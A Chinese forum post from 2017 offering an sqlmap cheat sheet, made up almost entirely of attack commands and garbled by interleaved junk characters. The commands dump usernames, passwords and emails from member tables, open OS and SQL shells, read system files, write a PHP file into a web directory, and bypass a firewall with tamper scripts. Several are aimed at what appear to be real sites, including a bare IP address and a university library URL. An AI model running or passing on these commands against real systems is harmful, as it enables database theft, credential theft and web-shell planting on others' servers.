找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1671|回复: 0
打印 上一主题 下一主题

sqlmap使用实例

[复制链接]
跳转到指定楼层
楼主
发表于 2017-5-19 17:03:10 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
/pentest/database/sqlmap
8 s) r; |( Q% h" K- t, M2 k
" ~) g# C" A8 N/ V- v" Hupdate :::::>     in the folder   after  execute    following   order : svn update2 G" ~9 i! Q  F) k
; ?: E; ^. d1 `
sqlmap.py -r 1.txt --current-db
7 s9 H  E/ q) `% D5 d! h4 \& G" |2 M" e" S% ]: S8 b8 u/ t0 S  L
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”  r% f( k0 b# ~' C/ u: e6 [

* e1 d9 r, W4 e; I# z% ~3 e6 m# r==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1)) & S. G8 A5 ?6 [  t$ D
猜解数据库0 e3 D2 P8 E! C* T3 _$ N) W% v& n
./sqlmap.py -u "injection-url" --dbs
" o: ]; ~0 q' Z; rsqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
1 o$ m' W. q* Z; N2 d7 P/ \2 z, F0 x! Q/ ?
猜解表名# B* w. s0 B0 G$ O
./sqlmap.py -u "injection-url" -D database_name --tables
. M, `2 T& v  P3 g! ]
9 k6 T+ ^6 Q9 l* ^6 t0 {sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"% B% j7 f1 S; N& K: T; t
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
! W- X0 \" O# L/ R+ P  F" U0 H! |- b$ ~. A: K" N
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
* k2 L- W4 G& w  B( N- n" \2 t
6 P- U5 I2 T' g$ N- E# o/ v6 g+ J# u3 @sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"0 I/ [' K2 U9 ^  m9 C: s1 P
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
+ R3 |# _3 v7 J8 ~- Q1 f5 ssqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
' M5 n+ G( x  l1 R6 [- [, v6 n* Bsqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
( m) B, S% ]5 R8 [3 y1 {8 l( T! a0 F/ {8 g% Z" ?( y
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
8 V  H. x' c) L3 Zsqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
% N2 L$ x6 p% H0 @6 \3 y) H: Ksqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
3 y& y* U: X0 `3 |sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
# y* B; ?- i2 b' m& S. msqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump/ s7 g) Z6 B2 v, b: W; B

: B: d% N0 `; D1 E) q  j3 t4 Esqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了
4 m' Y- t' _6 {2 @1 p1 K) g3 nsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"0 |1 g5 ~" s5 d) ~' j
% s" W' i2 C+ x" r" s# I4 Z
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"4 X  O4 F; {5 F# @3 ]* Q# {
猜解列名7 t! w5 P% y4 n
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
! o5 I8 {3 C) U( m, O6 }0 @3 l% U
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py" + t" H7 Q6 H8 ^) L1 H
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
+ `3 k6 S+ W3 X( Osqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
5 J" |( A, \7 K" U+ E& i; ?# |! K$ Z! e: j: ~
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
3 S- b$ t2 ]: @$ D&submit=Go
- g  U9 H; R6 ~# O- a* C& S/ u# h猜解值
+ Z& o& S" k6 r$ E- F7 i$ r3 n./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump: ?, V! }+ ?3 O* @3 N' x; Y
========================================================
* D5 Q+ ?# }8 ?7 j0 ^搜索表名中包括mana字符的
3 n; T7 X9 g7 g" e" [/sqlmap.py -u "injection-url" -T mana --search/ s* h$ _* p1 x# m; X
返回一个交互式sql shell
$ y' |. z" R4 l. r/sqlmap.py -u "injection-url" --sql-shell
; K: [4 h  s$ N8 R+ ~读取指定文件(需权限)
: [# H6 w' r5 }- R: j9 G) V; D/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
$ B, P: y, b* J) t% k- ?7 E0 Y查看当前 用户 及 数据库
) a0 S# k( P6 e8 Y4 K) A) _2 i/sqlmap.py -u "injection-url" --current-user --current-db
1 s: z5 |5 N3 F" f$ ^1 Z! N本地文件 写入 远程目标绝对路径' S8 @; f5 f5 ]
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径3 R  E- Q3 }7 @& ]+ @# V% q1 L
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
2 j2 B; |6 p  Z/ c/ v4 u5 D( X; T" S( B3 p  u5 s7 d
sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径3 d. `/ ^$ l8 C$ _" S
查看某用的权限$ u6 |3 Q& |: H/ n+ V
/sqlmap.py -u "injection-url" --privileges -U root6 `4 }0 J- h) u. ]
查看当前用户是否为dba
. |) l8 b. y% [' g. h/sqlmap.py -u "injection-url" --is-dba
1 f6 p1 e" e* j2 g8 A读取所有数据库用户或指定数据库用户的密码
4 S' x, T& v/ v; h! j( O. Asqlmap.py -r 1.txt --users --passwords; H3 w" |( i) R0 h2 P% k
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
. R" ?/ a' q  V/ N$ X! g6 y  f, u, E
# z: s/ U. _; m& o( ?/sqlmap.py -u "injection-url" --passwords -U root
( [) I- G2 J. @! t3 U3 I
% \5 K  p1 n' g  V--start&&--stop 与 --first&&--last 的区别
: l! v+ m1 s) U" @; r! \3 e/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
' g6 x7 I! ~* K1 x7 K; z
" L( l; N# L. m从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)1 A* Q6 s5 Z  L3 o
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
3 g0 }) T5 M1 }! W4 |; Y: l  L/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns1 E1 X5 `' n" d# |
3 Y2 N4 S3 m9 k5 D. E  h# X
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)
% X3 F" G- A' T+ y" U/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
3 @8 f$ |/ N! [. p
5 L9 p# |! s3 `& v. `# s
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表